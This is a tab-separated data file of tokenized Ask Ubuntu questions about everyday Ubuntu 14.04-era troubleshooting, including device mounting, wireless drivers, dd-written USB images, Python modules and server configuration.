503888	sansa clip strangeness	last week after a new install of xubuntu 14.04 stable i plugged in my sansa clip mp3 player and quickly found out it would n't mount . i read a suggestion to switch to msc , i had no luck . i then tried mtp and the player mounted and everything worked as it should , see files synced from old windows 7 install , transfer files back and forth by drag and drop here on linux , etc . today i tried getting some music on my player and i had to first keep plugging in and unplugging my player to get it to mount . last week mtp worked so that was the default setting for the player on the first try but it would n't finally mount until i tried auto and msc one time each then when i tried mtp again the player mounted . everything appeared to work but when i unplugged the player after dragging and dropping new music files onto it ( tried 2 different times and a few different ways , also tried copy and paste ) the files do n't show up in the player , even though when mounted the files appear in the folder in the player i put them in . i even tried to put a duplicate file in the same folder location and the file manager ( whatever comes with xubuntu ) picked up on me wanting to add a duplicate file and asked if i wanted to overwrite the existing file , which i did . when i disconnect the player from my computer , unmounting the player first or not , tried both ways , the files are n't in my player , file manager shows the files being where i wanted them to be . what gives ? the only change i 've made is disabling tooltips completely but drag and drop etc have been working fine with everything else . please help .
503889	when i use super+prt scr i get a transparent file	i am using gnome 3.12.2 this is a screenshot taken when i press prt scr ( i have a dual screen . chrome is maximised ) . this is one is taken when i do alt+shift+4 ( my shortcut to take an area screenshot ) . this is what happenes when i do super+print it varies though . sometimes it it completely white or black or transparent . google chrome and terminal are completely black , inkscape is yellow , and . the white space on that one atually has random transparent marks on it : ( screenshot of image viewer display ) i also have a shortcut ctrl+alt+prt scr to take a screenshot of a window and copy it to the clipboard . that produced the same as above . finally , a screenshot of my list of screenshot shortcuts , taken with area shot . i 'm using nvidia legacy binary driver - version 304.117 from nvidia-304 ( proprietary )
503891	how to change hostname	i have updated my system 's hostname in /etc/hostname file as master . i have also mapped my /etc/hosts file like < ip > master still , when i type $ hostname , i get a different hostname . i basically want to change my hostname from the default one to `` master '' . what file am i missing out ?
503894	trouble reinstalling windows after ubuntu	i had problems with windows , so about a year ago , we switched to ubuntu . unfortunately the functionality was reduced , and so i want to go back to windows , with all its problems . i followed the instructions on other websites , and made the 4 restoration disc , and then put them in one at a time as instructed . then , i restarted and it says , `` restoration incomplete '' . and it does n't do anything . i 'm using a presario cq56 , and our restoration discs were made on a second computer , which was also a presario cq56 . i do n't know how to get past this screen : '' restoration incomplete the restoration did not complete . please select one of the following buttons : save log details retry '' what am i supposed to do now ?
503895	respect bios-specified cpu speed without kernel patches , etc . in 14.04	i 've got a machine running `` in the wild '' in a very hot environment running an amd chip which is overheating . i do n't have physical access to the machine , but i have had someone change the cpu clock speed in the bios for me . unfortunately , the os does n't respect this and throttles the cpu back up to full speed when needed . i can not install any software through apt-get nor can i upload any software to the machine ; i need to work with the system in its current state due to security limitations . what i need to do is either ( 1 ) lock the machine in its lowest cpu speed or ( 2 ) have it respect the bios-specified cpu speed .
503898	touchpad scrolling does n't work on vmware workstation 10 with ubuntu 14.04 lts	i 've read most of the scrolling issues that are here but non of them really works for me . here is the output of xinput list : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ vmware vmware virtual usb mouse id=7 [ slave pointer ( 2 ) ] ⎜ ↳ elan touchscreen id=8 [ slave pointer ( 2 ) ] ⎜ ↳ imps/2 generic wheel mouse id=10 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=9 [ slave keyboard ( 3 ) ] there is no trackpad/touchpad/mouse horizontal /vertical two or three or four fingers scrolling anywhere in the normal configuration ... it has to be configured somewhere ; i just ca n't find it ...
503899	server convert raid1 to lvm and raid1 server	i currently have my ubuntu server setup as such : disk /dev/sda : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x0003d22b device boot start end blocks id system /dev/sda1 2048 195350527 97674240 fd linux raid autodetect /dev/sda2 * 195350528 3907028991 1855839232 fd linux raid autodetect disk /dev/sdb : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x000cd8db device boot start end blocks id system /dev/sdb1 2048 195350527 97674240 fd linux raid autodetect /dev/sdb2 * 195350528 3907028991 1855839232 fd linux raid autodetect disk /dev/md1 : 1900.2 gb , 1900244959232 bytes 2 heads , 4 sectors/track , 463926992 cylinders , total 3711415936 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 disk /dev/md1 does n't contain a valid partition table disk /dev/md0 : 100.0 gb , 99951181824 bytes 2 heads , 4 sectors/track , 24402144 cylinders , total 195217152 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 disk /dev/md0 does n't contain a valid partition table i would like to transition to a raid and lvm type of server without losing everything i have done to this point . is there a way i can save /dev/md1 and then drop it onto my newly created logical drive ?
503904	suspend disabled	when i click the power options , the ability to select suspend/hibernate is disabled for the laptop lid close action : i believe i am missing some packages to make this work . what are they ?
503908	stuck with 12.04 for now	i was hoping to upgrade our 12-year old desktop to 14.04 ( from 12.04 ) yet when i forced a distribution upgrade in the terminal & started to run the wizard , i got a series of errors in the terminal & a box that popped up saying my graphics may not be fully supported in trusty & that i should stay with 12.04 for now . my question is whether i could try to run the pc with `` ubuntu 2d '' or a gnome low graphic setting & try to upgrade from there . or am i stuck with 12.04 for the duration ? i 've been getting some occasional screen freezes ( where only the mouse moves ) & was hoping the upgrade would fix this issue , too .
503910	python3 modules	i 've recently installed ubuntu 14.04 and have been a python enthusiast for several years , since i used python in grad school for ( text ) data analysis . i 've noticed that 14.04 comes with both python 2.7 and 3.4 . however , the repository only installs python modules for python 2.7 . i was wondering if someone could walk me through the steps for installing modules for python 3.4 ( specifically numpy and matplotlib ) when the default `` python '' gives python 2.7 . thanks . no rush on an answer .
503911	unsure of owncloud mysql password and database	i 've recently attempted to make my pc an owncloud server . i attempted to logon on the same machine i am hosting it on . however , i first need to enter a mysql password , database name , etc. , and i do n't know any details . how can i find this out ?
503917	install ubuntu flavors in ubuntu 14.04 without changing the startup/login screens ?	i recently installed the community 's customized linux desktops on another machine , such as kde and lxde , but i also noticed my boot-up screen and startup screen changed . is there any way i can install all of the community 's customized desktops that come with the other versions of ubuntu , like lubuntu , kubuntu , xubuntu , ubuntu gnome , etc . and still keep the boot-up splash screen and the login landing screen as is ? if possible , provide a simple terminal command to do so .
503919	where is numlock in /usr/share/x11/xkb/symbols/	i want to modify numlock functionality by editing a file in /usr/share/x11/xkb/symbols/ . but where is it defined so that i can modify its definition ? i hope the new definition works in all keyboard layouts .
503920	wirless double the speed during upload ( 2.4g and 5g band )	i have been having some wireless troubles in terms of speed for some time now . eventually i bought a new router as the one supplied by the isp was n't very good , and while i did see a slight improvement , i have yet to see the results i want , so i starting doing more and more sleuthing around to see what i could find . my machine is a dual boot machine , and i notice while in windows my wireless performance is generally pretty good . especially on the 5g band for my n-card . i was getting great signal strength , and managed to do about 30mbps reliably . however , if i reboot into ubuntu , the signal strength for the 5g band network is very poor . i notice on average when using speedtest.net that my upload speed is usually more than double the speed of my download speed . i have been doing tests tonight , and while i get 15mbps down , i would on average get about 45mbps up . i tried increasing the tx power on my card , but it wo n't go above 16ddm . i do n't get an error , and i seem to be able to lower it , but it never goes any higher . and this is after setting the regulation to a country with a higher rate . i had also tried using the latest firmware for iwlwifi , but it would simply never load . i tried upgrading my kernel to 3.14 , but i always got an error regarding the driver api . if i am next to the router , i can on average get about 50mbps without issue . in my office though , i would say i am about 7-10 meters away from the router , though there is no doors or many obstacles in the way . the office is where i seem to have most of my issues . what can i do to see the signal strength i do in windows for the 5g band ? or , what can i do in general to bring up the performance of the wireless on my laptop ? it 's times like these that i debate going back to windows where basic things like wireless simply work . iwconfig wlan0 output : wlan0 ieee 802.11abgn essid : '' eh '' mode : managed frequency:2.457 ghz access point : d8 : eb:97:24:68 : d3 bit rate=57.8 mb/s tx-power=16 dbm retry short limit:7 rts thr : off fragment thr : off encryption key : off power management : on link quality=52/70 signal level=-58 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:2 missed beacon:0 lspci -v output for card : 02:00.0 network controller : intel corporation wireless 7260 ( rev 73 ) subsystem : intel corporation dual band wireless-n 7260 flags : bus master , fast devsel , latency 0 , irq 64 memory at e3500000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : < access denied > kernel driver in use : iwlwifi
503924	sound recorder does not show `` record as '' option	i am setting up a lubuntu box to install in a local classroom where people are not super tech-savvy . i need an audio recording software for them to record things using the microphone and save in a specific folder . i have chosen sound recorder because audio recorder and audacity are too complicated . i have one problem , that seems to be fairly common , but i have n't found the solution . the only option in the `` record from '' field is `` master '' and the `` record as '' field where there should be file format options ( .ogg , .wav , etc . ) is blank with no options . can anybody tell me how to actually record sound using `` sound recorder '' : p thanks ! edit : when run from terminal , when i press the record button it shows : ( gnome-sound-recorder:1894 ) : gstreamer-warning ** : element 'gconfaudiosource ' already has parent
503928	missing 'usb.h ' file : what is it , where do i get it ?	summary : what is 'usb.h ' ? is this a system specific file that should be installed with my os ? is it a software specific file that should be included with the source code i 'm compiling ? is it generically replaceable by download ? can i write this file from scratch ? expansion : very new to ubuntu . working my way through installations of my desired software ( gnu-radio and gnss-sdr ) . while trying to configure a certain piece of hardware ( sige gn3s sampler v2 usb device ) as an rf-front end for the software , i received the following errors : dsradin @ dsradin-hp-pavilion-dv6-notebook-pc : ~/gnss-sdr/drivers/gr-gn3s/build $ make scanning dependencies of target gr-gn3s [ 6 % ] building cxx object lib/cmakefiles/gr-gn3s.dir/gn3s_source_cc.cc.o in file included from /home/dsradin/gnss-sdr/drivers/gr-gn3s/include/fusb.h:26:0 , from /home/dsradin/gnss-sdr/drivers/gr-gn3s/include/gn3s.h:40 , from /home/dsradin/gnss-sdr/drivers/gr-gn3s/include/gn3s_source.h:30 , from /home/dsradin/gnss-sdr/drivers/gr-gn3s/include/gn3s_source_cc.h:35 , from /home/dsradin/gnss-sdr/drivers/gr-gn3s/lib/gn3s_source_cc.cc:34 : /home/dsradin/gnss-sdr/drivers/gr-gn3s/include/libusb_types.h:32:17 : fatal error : usb.h : no such file or directory # include < usb.h > ^ compilation terminated . make [ 2 ] : *** [ lib/cmakefiles/gr-gn3s.dir/gn3s_source_cc.cc.o ] error 1 make [ 1 ] : *** [ lib/cmakefiles/gr-gn3s.dir/all ] error 2 make : *** [ all ] error 2 i tried looking through the system to find the files with no joy : dsradin @ dsradin-hp-pavilion-dv6-notebook-pc : ~/gnss-sdr/drivers/gr-gn3s/build $ whereis usb.h usb : dsradin @ dsradin-hp-pavilion-dv6-notebook-pc : ~/gnss-sdr/drivers/gr-gn3s/build $ whereis libusb libusb : the excerpt from the readme i am following with the instructions say : build gn3s v2 custom firmware and driver ( optional ) go to gr-gn3s root directory , compile and install the driver : ( read the drivers/gr-gn3s/readme for more information ) $ cd gnss-sdr/drivers/gr-gn3s $ cd build $ cmake ../ $ make $ sudo make install $ sudo ldconfig set the environment variable gn3s_driver=1 in order to enable the gn3s_signal_source in gnss-sdr ( optional ) $ export gn3s_driver=1 in order to gain access to usb ports , gnss-sdr should be used as root . in addition , the driver requires access to the gn3s firmware binary file . it should be available in the same path where the application is called . gnss-sdr comes with a pre-compiled custom gn3s firmware available at gnss-sdr/firmware/gn3s_v2/bin/gn3s_firmware.ihx . please copy this file to the application path . the gnss-sdr default path is gnss-sdr/install ( in order to disable the gn3s_signal_source compilation , you should remove the gn3s_driver variable and build again gnss-sdr ) i have uninstalled all packages related and re-cloned the git repositories that house all the relevant source codes and scoured the internet but without more information about what exactly i 'm looking for i 'm stuck . any suggestions ? ? thank you for your help !
503932	vlc media player wo n't recognize movies	i just loaded the vlc media player into my ubuntu 14. -- . the vlc player does not recognize and wo n't play movies , either dvd or online . do i need codec ? if so , how do i obtain it and make it part of the application ?
503935	dd command not working properly in ubuntu 14.04	i have been using dd command to write an image file to my usb drive . after installing ubuntu 14.04 , the image is not getting written properly . the same image , which was written using another machine running fedora onto the same usb drive , worked properly . command which i use : sudo dd if= < image file name > of=/dev/sdb < mount point for usb device > bs=8192 conv=fsync can somebody let me know what can be the issue ? edited : @ bain i tried with another usb stick of different manufacturer . @ chaskes my issue is that the usb drive onto which i write the image with dd does not work properly . @ noleti . if= precedes the image name and i double checked that /dev/sdb is my usb stick . the exact command which i use for writing is sudo dd if=live.img of=/dev/sdb bs=8192 conv=fsync dmesg logs for first usb manufacturer ( sandisk ) [ 72755.427432 ] usb-storage 3-2:1.0 : usb mass storage device detected [ 72755.427515 ] scsi8 : usb-storage 3-2:1.0 [ 72755.427583 ] usbcore : registered new interface driver usb-storage [ 72756.424412 ] scsi 8:0:0:0 : direct-access sandisk cruzer fit 1.27 pq : 0 ansi : 6 [ 72756.424615 ] sd 8:0:0:0 : attached scsi generic sg2 type 0 [ 72756.426387 ] sd 8:0:0:0 : [ sdb ] 62530624 512-byte logical blocks : ( 32.0 gb/29.8 gib ) [ 72756.428163 ] sd 8:0:0:0 : [ sdb ] write protect is off [ 72756.428165 ] sd 8:0:0:0 : [ sdb ] mode sense : 43 00 00 00 [ 72756.428438 ] sd 8:0:0:0 : [ sdb ] write cache : disabled , read cache : enabled , does n't support dpo or fua [ 72756.438648 ] sdb : sdb1 [ 72756.441658 ] sd 8:0:0:0 : [ sdb ] attached scsi removable disk [ 72762.909474 ] systemd-hostnamed [ 21454 ] : warning : nss-myhostname is not installed . changing the local hostname might make it unresolveable . please install nss-myhostname ! dmesg log of usb stick ( hp ) [ 74802.289355 ] usb-storage 3-2:1.0 : usb mass storage device detected [ 74802.294664 ] scsi18 : usb-storage 3-2:1.0 [ 74804.751388 ] scsi 18:0:0:0 : direct-access hp v165w 1100 pq : 0 ansi : 0 ccs [ 74804.751571 ] sd 18:0:0:0 : attached scsi generic sg2 type 0 [ 74805.276042 ] sd 18:0:0:0 : [ sdb ] 7831552 512-byte logical blocks : ( 4.00 gb/3.73 gib ) [ 74805.276812 ] sd 18:0:0:0 : [ sdb ] write protect is off [ 74805.276816 ] sd 18:0:0:0 : [ sdb ] mode sense : 43 00 00 00 [ 74805.277584 ] sd 18:0:0:0 : [ sdb ] no caching mode page found [ 74805.277587 ] sd 18:0:0:0 : [ sdb ] assuming drive cache : write through [ 74806.317548 ] sd 18:0:0:0 : [ sdb ] no caching mode page found [ 74806.317553 ] sd 18:0:0:0 : [ sdb ] assuming drive cache : write through [ 74806.318808 ] sdb : sdb1 [ 74807.382933 ] sd 18:0:0:0 : [ sdb ] no caching mode page found [ 74807.382950 ] sd 18:0:0:0 : [ sdb ] assuming drive cache : write through [ 74807.382958 ] sd 18:0:0:0 : [ sdb ] attached scsi removable disk [ 74807.606891 ] ext4-fs ( sdb1 ) : mounted filesystem with ordered data mode . opts : ( null ) also when i reinsert the usb stick , i get below message in pop up error mounting /dev/sdb1 at /media/user/9782cd44-68ea-4437-accc-3c1120dc4d6b : command-line `mount -t `` ext4 '' -o `` uhelper=udisks2 , nodev , nosuid '' `` /dev/sdb1 '' `` /media/mathorat/9782cd44-68ea-4437-accc-3c1120dc4d6b '' ' exited with non-zero exit status 32 : mount : wrong fs type , bad option , bad superblock on /dev/sdb1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so the dmesg log for that contains : usb-storage 3-1:1.0 : usb mass storage device detected scsi20 : usb-storage 3-1:1.0 scsi 20:0:0:0 : direct-access hp v165w 1100 pq : 0 ansi : 0 ccs sd 20:0:0:0 : [ sdb ] 7831552 512-byte logical blocks : ( 4.00 gb/3.73 gib ) sd 20:0:0:0 : [ sdb ] write protect is off sd 20:0:0:0 : [ sdb ] mode sense : 43 00 00 00 sd 20:0:0:0 : [ sdb ] no caching mode page found sd 20:0:0:0 : [ sdb ] assuming drive cache : write through sd 20:0:0:0 : attached scsi generic sg2 type 0 sd 20:0:0:0 : [ sdb ] no caching mode page found sd 20:0:0:0 : [ sdb ] assuming drive cache : write through sdb : sdb1 sd 20:0:0:0 : [ sdb ] no caching mode page found sd 20:0:0:0 : [ sdb ] assuming drive cache : write through sd 20:0:0:0 : [ sdb ] attached scsi removable disk ext4-fs ( sdb1 ) : bad geometry : block count 978688 exceeds size of device ( 80760 blocks )
503936	wireless randomly becoming phantom hardblocked , only fixed by reboot	first off , i am aware of other people recently posting similar issues but none of the many fixes or suggestions in any thread i 've seen has resolved the issue for me . my asus netbook had been working fine for since i got it 6 - 8 months ago but in the past week or so the wifi started randomly freezing/crashing for no discernible reason and none of the normal methods for attempting to fix it yielded any results - only rebooting resolved it . the first & most obvious method i tried was to restart network-manager , but when i did that i noticed that afterwards wifi showed up as disabled . further research showed that somehow wifi had gotten hard blocked . there is a button on the keyboard for wifi and at first i figured i had accidentally hit it but 1 ) hitting it again does not unblock wifi and 2 ) ever since i have been hyper-conscious of not hitting it and wifi still randomly gets blocked . sometimes i can use the internet for hours and hours with no issue and sometimes after wifi freezes/crashes it will freeze/crash again within minutes of rebooting . it has been at least a week of this happening at least once a day and try as i might i have been unable to figure out any guess as to what is causing or triggering the freezes/crashes . fixes i have tried that have not solved the problem : -restoring bios back to defaults -all manner of rfkill unblocking -reinstalling wifi drivers -switching from network-manager to wicd -unloading & reloading wifi module ( brcmsmac ) notably , brcmsmac does not reload once i have sudo modprobe -r 'd it , running sudo modprobe brcmsmac after that yields nothing and at that point running lshw shows the wireless adaptor as `` unclaimed . '' again , only a reboot fixes this . other info/details : the fact that this began within the past week or so seems to me to indicate some kind of update triggered this , but i 've been running 14.04 since it was released in april so it would have to have been a more recent , smaller / more minor update that caused this issue if i 'm correct in assuming that is what caused it . lspci -vv 02:00.0 network controller : broadcom corporation bcm4313 802.11bgn wireless network adapter [ 14e4:4727 ] ( rev 01 ) subsystem : azurewave device 2047 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 17 region 0 : memory at f7d00000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : bcma-pci-bridge ifconfig eth1 link encap : ethernet hwaddr 74 : d0:2b:71:7d:3f up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:19 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:183 errors:0 dropped:0 overruns:0 frame:0 tx packets:183 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:36944 ( 36.9 kb ) tx bytes:36944 ( 36.9 kb ) wlan1 link encap : ethernet hwaddr dc:85 : de:56 : a4:14 inet addr:192.168.1.111 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :de85 : deff : fe56 : a414/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:8442 errors:0 dropped:710 overruns:0 frame:0 tx packets:5874 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:5259231 ( 5.2 mb ) tx bytes:1242666 ( 1.2 mb ) rfkill list ( when working ) 1 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : asus-wlan : wireless lan soft blocked : no hard blocked : no lshw -c network ( when working ) *-network description : network controller product : bcm4313 802.11bgn wireless network adapter vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : driver=bcma-pci-bridge latency=0 resources : irq:17 memory : f7d00000-f7d03fff *-network description : ethernet interface product : ar8162 fast ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth1 version : 10 serial : 74 : d0:2b:71:7d:3f capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=alx latency=0 link=no multicast=yes port=twisted pair resources : irq:45 memory : f7c00000-f7c3ffff ioport : e000 ( size=128 ) *-network description : wireless interface physical id : 1 logical name : wlan1 serial : dc:85 : de:56 : a4:14 capabilities : ethernet physical wireless configuration : broadcast=yes driver=brcmsmac driverversion=3.13.0-32-generic firmware=610.812 ip=192.168.1.111 link=yes multicast=yes wireless=ieee 802.11bgn rfkill list ( after crashed/frozen ) : 1 : phy0 : wireless lan soft blocked : no hard blocked : yes 2 : asus-wlan : wireless lan soft blocked : no hard blocked : no lshw -c network ( after crashed/frozen ) *-network description : network controller product : bcm4313 802.11bgn wireless network adapter vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : cap_list configuration : driver=bcma-pci-bridge latency=0 resources : irq:17 memory : f7d00000-f7d03fff *-network description : ethernet interface product : ar8162 fast ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth1 version : 10 serial : 74 : d0:2b:71:7d:3f capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=alx latency=0 link=no multicast=yes port=twisted pair resources : irq:45 memory : f7c00000-f7c3ffff ioport : e000 ( size=128 ) *-network disabled description : wireless interface physical id : 1 logical name : wlan1 serial : dc:85 : de:56 : a4:14 capabilities : ethernet physical wireless configuration : broadcast=yes driver=brcmsmac driverversion=3.13.0-32-generic firmware=610.812 link=no multicast=yes wireless=ieee 802.11bgn results after running : sudo modprobe -r brcmsmac & & sudo modprobe brcmsmac ( or any command variation of deactivating & then reactivating or modprobing brcmsmac ) rfkill list 2 : asus-wlan : wireless lan soft blocked : no hard blocked : no basically phy0 dissappears , i 'm assuming due to brcmsmac refusing to reactivate lshw -c network *-network unclaimed description : network controller product : bcm4313 802.11bgn wireless network adapter vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : cap_list configuration : latency=0 resources : memory : f7d00000-f7d03fff *-network description : ethernet interface product : ar8162 fast ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth1 version : 10 serial : 74 : d0:2b:71:7d:3f capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=alx latency=0 link=no multicast=yes port=twisted pair resources : irq:45 memory : f7c00000-f7c3ffff ioport : e000 ( size=128 ) basically wireless adaptor shows up as `` unclaimed '' again i assume related to brcmsmac not reactivating edit here are a few snippets that appear to be a relevant from /var/log/syslog as requested in comments : jul 28 02:20:04 chibitachop wpa_supplicant [ 1174 ] : wlan1 : ctrl-event-scan-started jul 28 02:42:32 chibitachop kernel : [ 29767.677589 ] brcmsmac bcma0:0 : start : tid 1 is not agg'able jul 28 02:50:49 chibitachop kernel : [ 30265.344485 ] brcmsmac bcma0:0 : start : tid 1 is not agg'able jul 28 03:05:34 chibitachop kernel : [ 31149.541093 ] brcmsmac bcma0:0 : start : tid 2 is not agg'able jul 28 03:08:35 chibitachop kernel : [ 31331.008431 ] brcmsmac bcma0:0 : start : tid 2 is not agg'able jul 28 17:20:55 chibitachop kernel : [ 82469.075694 ] brcmsmac bcma0:0 : wl0 : brcms_c_watchdog : dead chip jul 28 17:20:55 chibitachop kernel : [ 82469.144339 ] brcmsmac bcma0:0 : ops- > tx called while down jul 28 17:20:55 chibitachop kernel : [ 82469.332841 ] brcmsmac bcma0:0 : ops- > tx called while down jul 28 17:20:56 chibitachop wpa_supplicant [ 1174 ] : wlan1 : ctrl-event-disconnected bssid=bc : ee:7b : f3:32 : b8 reason=4 locally_generated=1 jul 28 17:20:56 chibitachop kernel : [ 82470.179674 ] brcmsmac bcma0:0 : brcmsmac : brcms_ops_bss_info_changed : disassociated jul 28 17:20:56 chibitachop kernel : [ 82470.179688 ] brcmsmac bcma0:0 : brcms_ops_bss_info_changed : arp filtering : 1 addresses ( implement ) jul 28 17:20:56 chibitachop kernel : [ 82470.179692 ] brcmsmac bcma0:0 : brcms_ops_bss_info_changed : qos enabled : false ( implement ) jul 28 17:20:56 chibitachop kernel : [ 82470.179697 ] brcmsmac bcma0:0 : wl0 : brcms_c_wme_setparams : no-clock additionally in regards to the other posting this has been marked potentially redundant with , that user has 14e4:432b while mine is 14e4:4727 so the blacklisting procedure is different even if it did work , which as i said in my comment it did not for me . searching based on error messages found in /var/log/syslog i found this thread from a couple months ago where someone using the same 14e4:4727 broadcomm as me had similar problems which were never solved : http : //ubuntuforums.org/showthread.php ? t=2212368 & page=4 in response to the post my issue is currently allegedly a duplicate of , which itself redirects to a broadcomm driver installation guide - that broadcom installation guide was one of the first posts i found when i began researching this issue . according to that guide my broadcom card is `` special case # 1 - this device uses the driver combination bcma and brcmsmac . it should n't be necessary to install anything at all . required firmware is installed by default in the package linux-firmware . '' despite that , i tried reinstalling the drivers and trying every combination of blacklisting all to no avail as mentioned in my original posting . as i have said before , my wireless had been working fine for 6 - 8 months since i bought the computer so i know i had the driver configuration right until something somehow messed it up a week or so ago . my only guess as to what could have caused this issue is a change in a recent minor update since i had n't made any adjustments to any wireless or networking settings since i initially set-up the computer back when i bought it and have been running 14.04 since it was released in april . nevertheless as i already said one of the first fixes i tried before even posting here was reinstalling / blacklisting drivers as per the very instructions my post is currently marked as a duplicate of and it did not resolve the issue .
503941	nautilus how filter every files by extension	i want to filter every mp3 files in certain folder and its sub-folders . i typed *.mp3 in the search box but it is not working .
503942	does spyware exist for ubuntu ?	someone i know said he had put spyware on my computer . is he talking crap ? i 've been using ubuntu 12.04 for nearly 3 years now and i 've never seen any type of spyware , remote keyloggers or rats ( remote access tools ) and likewise , backdoors . i 've searched several ubuntu forums and nothing . other than that amazon thing . if they even exist , are there antivirus scanners to find , identify and remove them ?
503943	i canâ´t install cinammon on ubuntu 12.04 lts	i 'm new on linux and i 've installed ubuntu 12.04 lts . i want to install cinnamon but after typing sudo add-apt-repository ppa : gwendal-lebihan-dev/cinammon-stable it shows me this : can not access ppa ( https : //launchpad.net/api/1.0/~gwendal-lebihan-dev/+archive/cinammon-stable ) to get ppa information , please check your internet connection . i dont know what to do , and i really want to install cinnamon . i hope anybody can help me with this . thanks ! !
503949	pip for python not found in 14.04	$ sudo apt-get install python-pip e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? the above is what is displayed by terminal when i try to install python pip on my ubuntu 14.04 . also i have python 2.7.6 ( default , mar 22 2014 , 22:59:56 ) installed
503951	server locking up router	i have an ubuntu server 14.04 with two kvm vm 's running 12 and i am having issues with them locking up my router . i will loose all connectivity ca n't ssh or webmin into them and any external users loses the connection anyone ideas ? one server run 's mumble the other server runs a minecraft server . quit editing the post and answer it .
503952	update from 13.10 to 14.04 apache configuration	i just click on update when 13.10 asks me to update the current version . i got update abort message and it did not finish all process and update says that it reverse the update , i waited until it finish reverse the version . it looks everything ok , after reboot i see that ubuntu 14.04 lts and i go to about this computer is says ubuntu 14.04 , it seems that the system updated to 14.04 . i tried to localhost on firefox , it shows the index of , but i got file server not found when i go to look file i created before like localhost/mywebsite/myindex.php , files still exists at var/www/mywebsite/myindex.php . i would like to learn how to configure my new apache . mysqladmin works after update . your help and information is great appreciated .
503953	ubuntu 14.04.1 audio crashes after using hydrogen drum machine app	basically i can play all audio , from system startup , but after using hydrogen drum app , i can no longer playback any audio , or videos . any help ?
503954	how to compile/install bind9 with dlz ( mysql ) support ?	i am wondering how to compile or install a version of bind9 that supports dlz ( specifically , mysql ) on ubuntu 14.04 . according to my internet research , bind9 does n't support it by default . does anyone know of a good tutorial , or know personally , how to do this ? all of the tutorials that do exist seem to be three years old and written for ubuntu 12.04 .
